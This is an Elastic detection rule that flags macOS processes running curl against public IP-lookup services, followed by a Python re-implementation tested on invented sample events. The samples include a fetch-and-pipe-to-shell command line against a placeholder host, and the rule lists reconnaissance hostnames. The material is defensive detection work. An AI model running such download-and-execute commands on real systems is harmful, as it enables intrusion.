External IP Address Discovery via Curl
Detects a macOS application, shell one-liner, or unsigned or untrusted binary invoking curl (or nscurl) against a known public IP address lookup web service. Malware commonly does this during reconnaissance to learn the victim's external IP address (and, for geolocation services, the victim's approximate location) before deciding whether the host is worth pursuing.
Rule type: eql
Rule indices:
- logs-endpoint.events.process-*
Rule Severity: low
Risk Score: 21
Runs every:
Searches indices from: now-9m
Maximum alerts per execution: ?
References:
Tags:
- Domain: Endpoint
- OS: macOS
- Use Case: Threat Detection
- Tactic: Discovery
- Data Source: Elastic Defend
Version: ?
Rule authors:
- Elastic
Rule license: Elastic License v2
process where host.os.type == "macos" and event.type == "start" and event.action == "exec" and
((process.parent.executable like ("/Applications/*", "/Volumes/*", "/private/var/folders/*")) or
(process.parent.name in ("bash", "sh", "zsh") and process.parent.command_line like "*http*") or
(process.parent.code_signature.trusted == false or process.code_signature.exists == false)) and
process.name in ("curl", "nscurl") and
process.args_count <= 5 and
process.command_line like ("*ip-api.com*", "*ipwho.is*", "*checkip.dyndns.org*", "*api.ipify.org*",
"*whatismyip.akamai.com*", "*ifcfg.me*", "*ifconfig.me*", "*ident.me*",
"*icanhazip.com*", "*ipecho.net*", "*api.myip.com*", "*checkip.amazonaws.com*",
"*wtfismyip.com*", "*iplogger.*", "*freegeoip.net*", "*ipinfo.io*",
"*geoplugin.net*", "*httpbin.org*", "*myip.opendns.com*")
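To see exactly which events the query above fires on, the following is an added Python re-implementation of its clauses, run over a handful of constructed process events. It is not Elastic's code and it does not use Elastic's EQL engine; the assumed event layout mirrors the ECS field names the query references (process.name, process.args_count, process.parent.executable, process.parent.command_line, process.parent.code_signature.trusted, process.code_signature.exists), and the sample events, executables and URLs are invented for illustration.

```python
import re

# Service list copied from the rule; EQL `like` is a case-sensitive glob.
IP_LOOKUP_PATTERNS = [
    "*ip-api.com*", "*ipwho.is*", "*checkip.dyndns.org*", "*api.ipify.org*",
    "*whatismyip.akamai.com*", "*ifcfg.me*", "*ifconfig.me*", "*ident.me*",
    "*icanhazip.com*", "*ipecho.net*", "*api.myip.com*", "*checkip.amazonaws.com*",
    "*wtfismyip.com*", "*iplogger.*", "*freegeoip.net*", "*ipinfo.io*",
    "*geoplugin.net*", "*httpbin.org*", "*myip.opendns.com*",
]
SUSPICIOUS_PARENT_PATHS = ["/Applications/*", "/Volumes/*", "/private/var/folders/*"]
SHELLS = {"bash", "sh", "zsh"}
CURL_NAMES = {"curl", "nscurl"}


def eql_like(value, pattern):
    """EQL `like`: `*` matches any run, `?` one character, everything else is
    literal (so the '.' in '*iplogger.*' is a real dot), case-sensitive."""
    if value is None:
        return False
    regex = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c) for c in pattern)
    return re.fullmatch(regex, value, flags=re.DOTALL) is not None


def like_any(value, patterns):
    return any(eql_like(value, p) for p in patterns)


def get(event, dotted):
    """Resolve an ECS-style dotted field name against a nested dict (None if absent)."""
    cur = event
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def matches_rule(event):
    """True when a process event satisfies every clause of the EQL rule."""
    if not (get(event, "host.os.type") == "macos" and get(event, "event.type") == "start"
            and get(event, "event.action") == "exec"):
        return False
    # Parent context: untrusted location, a shell that was itself handed a URL, or a
    # missing/untrusted code signature. `== false` in EQL does not match an absent
    # field, which `is False` reproduces here.
    suspicious_parent = (
        like_any(get(event, "process.parent.executable"), SUSPICIOUS_PARENT_PATHS)
        or (get(event, "process.parent.name") in SHELLS
            and eql_like(get(event, "process.parent.command_line"), "*http*"))
        or get(event, "process.parent.code_signature.trusted") is False
        or get(event, "process.code_signature.exists") is False
    )
    if not suspicious_parent:
        return False
    args_count = get(event, "process.args_count")
    return (get(event, "process.name") in CURL_NAMES
            and args_count is not None and args_count <= 5
            and like_any(get(event, "process.command_line"), IP_LOOKUP_PATTERNS))


def make_event(name, command_line, args_count, parent_exe, parent_name,
               parent_cmd=None, parent_trusted=True, sig_exists=True):
    """Build a constructed endpoint process event in the assumed ECS-like shape."""
    return {
        "host": {"os": {"type": "macos"}},
        "event": {"type": "start", "action": "exec"},
        "process": {
            "name": name, "command_line": command_line, "args_count": args_count,
            "code_signature": {"exists": sig_exists},
            "parent": {"executable": parent_exe, "name": parent_name,
                       "command_line": parent_cmd,
                       "code_signature": {"trusted": parent_trusted}},
        },
    }


# Constructed sample events (paths and hostnames are invented).
SAMPLE_EVENTS = {
    # untrusted app bundle under /Applications shells out to curl
    "unsigned_app_ipify": make_event("curl", "curl -s https://api.ipify.org", 3,
                                     "/Applications/Updater.app/Contents/MacOS/Updater",
                                     "Updater", parent_trusted=False),
    # zsh that was handed a URL on its own command line, then runs curl
    "shell_oneliner": make_event("curl", "curl ifconfig.me", 2, "/bin/zsh", "zsh",
                                 parent_cmd="zsh -c 'curl http://example.invalid/x | sh'"),
    # interactive user in a trusted, signed Terminal: no parent clause is satisfied
    "terminal_user": make_event("curl", "curl https://ifconfig.me", 2,
                                "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
                                "Terminal"),
    # same untrusted app, but a verbose curl exceeds the args_count <= 5 bound
    "many_args": make_event("curl", "curl -sS -L --max-time 5 -H 'Accept: text/plain' https://icanhazip.com",
                            8, "/Applications/Foo.app/Contents/MacOS/Foo", "Foo", parent_trusted=False),
    # lookup against a service that is not on the list
    "unlisted_service": make_event("curl", "curl https://example.invalid/ip", 2,
                                   "/Applications/Foo.app/Contents/MacOS/Foo", "Foo", parent_trusted=False),
}


def evaluate(events=SAMPLE_EVENTS):
    """Names of the sample events the rule would alert on."""
    return sorted(name for name, ev in events.items() if matches_rule(ev))


if __name__ == "__main__":
    print(evaluate())
```

The two misses in the sample set are the caveats a practitioner should keep in mind when tuning: a curl invocation with more than five arguments, or a lookup service missing from the hostname list, passes through silently, so the rule trades coverage for a low false-positive rate, which is why it is scored low. Note also that the `== false` clauses only fire when the code-signature fields are actually populated; an event that lacks them entirely relies on the path or shell clauses.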
Framework: MITRE ATT&CK
Tactic:
- Name: Discovery
- Id: TA0007
- Reference URL: https://attack.mitre.org/tactics/TA0007/
Technique:
- Name: System Network Configuration Discovery
- Id: T1016
- Reference URL: https://attack.mitre.org/techniques/T1016/
Sub Technique:
- Name: Internet Connection Discovery
- Id: T1016.001
- Reference URL: https://attack.mitre.org/techniques/T1016/001/